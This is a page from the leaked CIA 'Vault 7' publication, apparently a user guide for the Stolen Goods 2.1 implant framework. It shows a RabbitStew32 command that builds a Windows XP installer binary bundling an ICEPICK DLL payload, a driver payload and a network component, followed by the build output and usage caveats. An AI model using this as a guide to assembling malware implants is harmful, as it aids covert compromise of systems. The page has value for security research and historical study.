Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.
SECRET//NOFORN
9. (S//NF) Example 2: Configuring SG 2.1 for Shellterm's Shellcode
injector module
(S//NF) The following example shows how to configure SG2.1 with an ICEPICK DLL
payload, JediMindTricks driver payload, and to use the network component. The
resulting binary file will be written to 'winxp32_dsn.bin'. This assumes Vbr.exe has been
run to generate the proper .asm file, and the .asm file is in the same folder as
RabbitStew32.
(S//NF) Figure 17 – The first line is what the user enters. We use '--xp' to denote that the target OS is Windows
XP. The output from the command includes some debugging information that you can use for verification
(these details can be found in the receipt file). Note: some sizes are in sectors (1 sector = 512 bytes for SG2)
C:\...\shellcode_builder>RabbitStew32.exe --xp --pd sg_ip_32_gh1.dll --sp c:\stub.dll
--output winxp32_dsn.bin --network --ps c:\payloads\ap_winxp.sys
Binary: 'winxp32_dsn.bin'..
pArgs [009800F6] offset [d6]
Copying in VBR image
File [Binaries\msvcrt_WinXPx86.sys] size is [49664]
File [c:\payloads\ap_winxp.sys] size is [18560]
File [sg_ip_32_gh1.dll] size is [109568]
File [Binaries\MemStub32.dll] size is [70144]
File [Binaries\network_WinXPx86.sys] size is [23296]
Copying in parameters
Stub Driver size is [97]
Payload Driver size is [37]
Payload DLL size is [215]
Addons size is [46]
Total payload size is [395]
DLL PATH XOR key is: bd ac fa 6d f0 ff 7b ba d6 27 b8 29 56 7d 72 07
--- Write completed..
(S//NF) Yes, it is that simple! Note, in the above example, we use a GH1 ICEPICK
without using the --gh1 switch (non-GH1 stub). This is OK for ICEPICK, as ICEPICK
properly handles the condition where the stub launching ICEPICK is not GH1 compliant.
This is by design in ICEPICK, to reduce the number of binaries that can be created. Not
all implants are created equally, so do not assume another implant/payload will handle
things accordingly.
(S//NF) There are two main downsides to using the shellcode installer. The first, and
obvious, one is that you must use Shellterm to launch it. The second downside is that the
shellcode installer does not do a lot of safety checks. If the files provided to --ps and --pd
exist, they will be read in and used accordingly. If you accidentally provide a text file to
--ps, instead of a valid driver file, the system will explode on use. The Grasshopper
installer performs a few more verification checks for the user.
SECRET//NOFORN
- xxi -